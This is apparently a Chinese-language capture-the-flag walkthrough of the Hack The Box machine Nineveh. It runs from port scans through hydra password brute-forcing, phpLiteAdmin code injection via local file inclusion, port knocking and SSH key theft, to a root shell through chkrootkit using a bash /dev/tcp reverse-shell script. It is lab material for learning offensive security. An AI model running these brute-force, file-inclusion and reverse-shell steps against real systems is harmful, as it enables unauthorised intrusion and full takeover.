先使用 nmap 扫描常见端口,发现只开放了 80 和 443 端口,不想扫描详细信息了
- ┌──(kali㉿kali)-[~/vegetable/HTB/Nineveh]
- └─$ nmap
- Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-01 01:42 EDT
- Nmap scan report for
- Host is up (0.45s latency).
- Not shown: 998 filtered tcp ports (no-response)
- 80/tcp open http
- 443/tcp open https
- Nmap done: 1 IP address (1 host up) scanned in 36.22 seconds
两个端口展示的内容不同,80 端口显示如下
443 端口显示如下
Web 页面中都没有什么东西,使用 gobuster 扫描一下目录
- gobuster dir --url --wordlist /usr/share/dirb/wordlists/big.txt -o dir.80
- gobuster dir --url --wordlist /usr/share/dirb/wordlists/big.txt -o dir.443 -k
80 端口扫描出来发现了一个 /department 接口,访问会自动跳转至 /department/login.php,输入常见的用户名口令admin/123456 登录,页面提示 invalid password,而输入 vegetable 作为用户名,页面会显示 invalid username,可以确认用户名为 admin
没有密码,暂时也不想暴力破解,查看 443 端口的目录扫描结果,发现了 /db 接口,访问发现页面如下
phpLiteAdmin 是一个基于 Web 的 SQLite 数据库管理工具,用 PHP 编写,支持 SQLite3 和 SQLite2。遵循 SQLite 使用的平面文件系统的精神,phpLiteAdmin 由单个源文件 phpliteadmin.php 组成,该文件被放入服务器上的目录中,然后在浏览器中访问。
我比较感兴趣的是最后一个,版本匹配,而且可以执行命令,不过首先需要登录。phpLiteAdmin 系统只需要输入密码即可,可以尝试利用 hydra 来暴力破解,虽然只需要爆破密码,但是仍然需要指定一个用户名,虽然可能并不会使用指定的用户名,这里我指定了 admin,选用了一个比较小的字典,很快就得到了答案
- ┌──(kali㉿kali)-[~/vegetable/HTB/Nineveh]
- └─$ hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/2020-200_most_used_passwords.txt https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"
- Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
- Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-01 03:42:54
- [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
- [DATA] max 16 tasks per 1 server, overall 16 tasks, 197 login tries (l:1/p:197), ~13 tries per task
- [DATA] attacking http-post-forms://^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password
- [443][http-post-form] host: login: admin password: password123
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-01 03:43:34
很快就发现了密码,使用 password123 登录系统,然后按照 PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps Exploit (exploit-db.com) 来进行漏洞利用
1、创建一个新的数据库 hack.php
2、创建一个新表,类型为 TEXT,Value 为
3、创建成功返回后,可以点击 Rename Database 来查看路径
但是无法访问该文件,线索又断了,只能重新回到 80 端口,因为可以确定用户名为 admin,尝试暴力破解登录看看,然后非常快就得到了结果
- ┌──(kali㉿kali)-[~]
- └─$ hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/2020-200_most_used_passwords.txt http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password"
- Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
- Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-01 04:53:05
- [DATA] max 16 tasks per 1 server, overall 16 tasks, 197 login tries (l:1/p:197), ~13 tries per task
- [DATA] attacking http-post-form://^PASS^:Invalid Password
- [80][http-post-form] host: login: admin password: 1q2w3e4r5t
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-01 04:53:19
使用用户名口令登录系统,点击 Notes 可以看到下面的话,secret folder,还有 url 的格式感觉都像是 LFI
测试如果直接添加 ···manage.php?notes=../../../../../../../etc/passwd 则会显示 No Note is selected,添加上 /files/ninevehNotes.txt 又会报错,在尝试后,发现在 txt 后添加 7 个 ../ 可以成功包含文件
但是当我使用命令 manage.php?notes=files/ninevehNotes/../../../../../../../var/tmp/hack.php 尝试包含刚才创建的 hack.php 时又会显示 File name too long. 然后我删掉了一个 ../ 成功的包含了 hack.php 文件,并且可以执行命令
可以在 Online - Reverse Shell Generator (revshells.com) 中构造一个反向连接 shell,执行后在监听端会收到一个 shell
- ┌──(kali㉿kali)-[~]
- └─$ nc -nvlp 4444
- listening on [any] 4444 ...
- connect to [] from (UNKNOWN) [] 33734
- bash: cannot set terminal process group (1412): Inappropriate ioctl for device
- bash: no job control in this shell
- www-data@nineveh:/var/www/html/department$ python3 -c 'import pty;pty.spawn("/bin/bash")'
- <tml/department$ python3 -c 'import pty;pty.spawn("/bin/bash")'
- www-data@nineveh:/var/www/html/department$ ^Z
- zsh: suspended nc -nvlp 4444
- ┌──(kali㉿kali)-[~]
- └─$ stty raw -echo;fg
- [1] + continued nc -nvlp 4444
- reset
- reset: unknown terminal type unknown
- Terminal type? screen
目前拿到了 www-data 的 shell,在 /var/www/ssl/secure_notes 目录中发现了一张图片 nineveh.png,使用 cat 直接打开时发现出现了下面的 rsa 密钥,可以直接使用 strings 命令打开,看起来会舒服一点,将私钥复制保存在 kali 机器中,并为其赋予 600 权限,以便后期可以利用密钥连接 ssh 服务
一开始使用 nmap 扫描并没有发现 22 端口,需要利用 port knocking
- www-data@nineveh:/var/www/ssl/secure_notes$ netstat -anultp | grep 22
- (Not all processes could be identified, non-owned process info
- will not be shown, you would have to be root to see it all.)
- tcp 0 0* LISTEN -
- tcp6 0 0 :::22 :::* LISTEN -
knockd 程序,当按照一定顺序敲击端口时,它将会设置某些防火墙规则,配置文件如下。看到如果在 5 秒钟之内,按照 571,290,911 的顺序依次访问这些端口,达成敲门效果,则会对外开放 22 端口
- www-data@nineveh:/var/www/ssl/secure_notes$ cat /etc/knockd.conf
- [options]
- logfile = /var/log/knockd.log
- interface = ens160
- [openSSH]
- sequence = 571, 290, 911
- seq_timeout = 5
- start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
- tcpflags = syn
- [closeSSH]
- sequence = 911,290,571
- seq_timeout = 5
- start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
- tcpflags = syn
可以参考 端口敲击 - ArchWiki (archlinux.org) 来查看如何操作,因为只有 5 秒,所以可以利用 for 循环让机器自动执行 nmap -Pn --host-timeout 100 --max-retries 0 -p $i 操作,在所有端口都访问过之后,22 端口会被打开,利用 id_rsa 来连接 ssh 服务
- ┌──(kali㉿kali)-[~]
- └─$ for i in 571 290 911; do
- nmap -Pn --host-timeout 100 --max-retries 0 -p $i
- done; ssh -i vegetable/HTB/Nineveh/id_rsa amrois@
- Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 02:58 EDT
- Warning: giving up on port because retransmission cap hit (0).
- Nmap scan report for
- Host is up.
- 571/tcp filtered umeter
- Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
- Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 02:58 EDT
- Warning: giving up on port because retransmission cap hit (0).
- Nmap scan report for
- Host is up.
- 290/tcp filtered unknown
- Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
- Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 02:58 EDT
- Warning: giving up on port because retransmission cap hit (0).
- Nmap scan report for
- Host is up.
- 911/tcp filtered xact-backup
- Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
- Ubuntu 16.04.2 LTS
- Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
- * Documentation: https://help.ubuntu.com
- * Management: https://landscape.canonical.com
- * Support: https://ubuntu.com/advantage
- 288 packages can be updated.
- 207 updates are security updates.
- You have mail.
- Last login: Mon Jul 3 00:19:59 2017 from
- amrois@nineveh:~$
成功登录后,在当前目录下可以看到 user.txt
上传 linpeas.sh 来枚举系统弱点,发现存在有计划任务,在 report 目录下存在有很多 report.txt,并且 /usr/sbin/report-reset.sh 也会定期删除这些文件
- amrois@nineveh:/report$ ls -al
- total 56
- drwxr-xr-x 2 amrois amrois 4096 Apr 2 02:05 .
- drwxr-xr-x 24 root root 4096 Jan 29 2021 ..
- -rw-r--r-- 1 amrois amrois 4801 Apr 2 02:00 report-24-04-02:02:00.txt
- -rw-r--r-- 1 amrois amrois 4801 Apr 2 02:01 report-24-04-02:02:01.txt
- -rw-r--r-- 1 amrois amrois 4801 Apr 2 02:02 report-24-04-02:02:02.txt
- -rw-r--r-- 1 amrois amrois 4801 Apr 2 02:03 report-24-04-02:02:03.txt
- -rw-r--r-- 1 amrois amrois 4801 Apr 2 02:04 report-24-04-02:02:04.txt
- -rw-r--r-- 1 amrois amrois 4801 Apr 2 02:05 report-24-04-02:02:05.txt
上传并运行 pspy,发现了每分钟都有一连串的任务,很多进程调用了 chkrootkit 工具,搜索时发现该工具存在本地提权漏洞
- ┌──(kali㉿kali)-[~]
- └─$ searchsploit chkrootkit
- ------------------------------------------------------------------------------------------------------------------------- ---------------------------------
- Exploit Title | Path
- ------------------------------------------------------------------------------------------------------------------------- ---------------------------------
- Chkrootkit - Local Privilege Escalation (Metasploit) | linux/local/38775.rb
- Chkrootkit 0.49 - Local Privilege Escalation | linux/local/33899.txt
- ------------------------------------------------------------------------------------------------------------------------- ---------------------------------
- Shellcodes: No Results
漏洞其实就是该程序会定期以 root 身份执行 /tmp/update 文件,所以在 /tmp 目录下创建一个包含有反向 shell 连接脚本内容的 update文件即可
- amrois@nineveh:/tmp$ cat update
- #!/bin/bash
- bash -i >& /dev/tcp/ 0>&1
过一段时间,在监听端即可收到 shell
